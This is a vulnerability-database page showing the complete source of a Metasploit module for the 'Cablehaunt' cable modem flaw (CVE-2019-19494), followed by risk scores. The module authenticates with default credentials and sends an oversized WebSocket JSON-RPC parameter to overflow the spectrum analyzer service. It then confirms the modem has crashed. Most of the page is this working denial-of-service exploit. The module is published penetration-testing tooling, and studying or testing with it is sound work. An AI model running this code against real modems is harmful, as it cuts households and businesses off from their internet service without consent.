Lucene search
K

"Cablehaunt" Cable Modem WebSocket DoS

Cablehaunt" Cable Modem WebSocket DoS is a buffer overflow vulnerability in certain Cable Modem Spectrum Analyzer interfaces, leading to Denial of Service. The exploit differs between various makes, models, and firmware versions, causing instability and potential IOC in logs

Related
Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'eventmachine'
require 'faye/websocket'

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => '"Cablehaunt" Cable Modem WebSocket DoS',
        'Description' => %q{
          There exists a buffer overflow vulnerability in certain
          Cable Modem Spectrum Analyzer interfaces.  This overflow
          is exploitable, but since an exploit would differ between
          every make, model, and firmware version (which also
          differs from ISP to ISP), this module simply causes a
          Denial of Service to test if the vulnerability is present.
        },
        'Author' => [
          'Alexander Dalsgaard Krog (Lyrebirds)', # Original research, discovery, and PoC
          'Jens Hegner Stærmose (Lyrebirds)', # Original research, discovery, and PoC
          'Kasper Kohsel Terndrup (Lyrebirds)', # Original research, discovery, and PoC
          'Simon Vandel Sillesen (Independent)', # Original research, discovery, and PoC
          'Nicholas Starke' # msf module
        ],
        'References' => [
          ['CVE', '2019-19494'],
          ['EDB', '47936'],
          ['URL', 'https://cablehaunt.com/'],
          ['URL', 'https://github.com/Lyrebirds/sagemcom-fast-3890-exploit']
        ],
        'DisclosureDate' => '2020-01-07',
        'License' => MSF_LICENSE,
        'Notes' => {
          'Stability' => [CRASH_SERVICE_DOWN],
          'SideEffects' => [IOC_IN_LOGS],
          'Reliability' => []
        }
      )
    )

    register_options(
      [
        Opt::RHOST('192.168.100.1'),
        Opt::RPORT(8080),
        OptString.new('WS_USERNAME', [true, 'WebSocket connection basic auth username', 'admin']),
        OptString.new('WS_PASSWORD', [true, 'WebSocket connection basic auth password', 'password']),
        OptInt.new('TIMEOUT', [true, 'Time to wait for response', 15])
      ]
    )

    deregister_options('Proxies')
    deregister_options('VHOST')
    deregister_options('SSL')
  end

  def run
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => '/',
      'authorization' => basic_auth(datastore['WS_USERNAME'], datastore['WS_PASSWORD'])
    })

    fail_with(Failure::Unreachable, 'Cannot Connect to Cable Modem Spectrum Analyzer Web Service') if res.nil?
    fail_with(Failure::Unknown, 'Credentials were incorrect') if res.code != 200

    @succeeded = false
    EM.run do
      print_status("Attempting Connection to #{datastore['RHOST']}")

      driver = Faye::WebSocket::Client.new("ws://#{datastore['RHOST']}:#{datastore['RPORT']}/Frontend", ['rpc-frontend'])

      driver.on :open do
        print_status('Opened connection')

        EM::Timer.new(1) do
          print_status('Sending payload')
          payload = Rex::Text.rand_text_alphanumeric(7000..8000)
          driver.send({
            jsonrpc: '2.0',
            method: 'Frontend::GetFrontendSpectrumData',
            params: {
              coreID: 0,
              fStartHz: payload,
              fStopHz: 1000000000,
              fftSize: 1024,
              gain: 1
            },
            id: '0'
          }.to_json)
        rescue StandardError
          fail_with(Failure::Unreachable, 'Could not establish websocket connection')
        end
      end

      EM::Timer.new(10) do
        print_status('Checking Modem Status')
        begin
          res = send_request_cgi({
            'method' => 'GET',
            'uri' => '/'
          })

          if res.nil?
            @succeeded = true
            print_status('Cable Modem unreachable')
          else
            fail_with(Failure::Unknown, 'Host still reachable')
          end
        rescue StandardError
          @succeeded = true
          print_status('Cable Modem unreachable')
        end
      end

      EM::Timer.new(datastore['TIMEOUT']) do
        EventMachine.stop
        if @succeeded
          print_good('Exploit delivered and cable modem unreachable.')
        else
          fail_with(Failure::Unknown, 'Unknown failure occurred')
        end
      end
    end
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

08 Feb 2023 11:45Current
10High risk
Vulners AI Score10
CVSS 29.3
CVSS 3.18.8
EPSS0.22924
54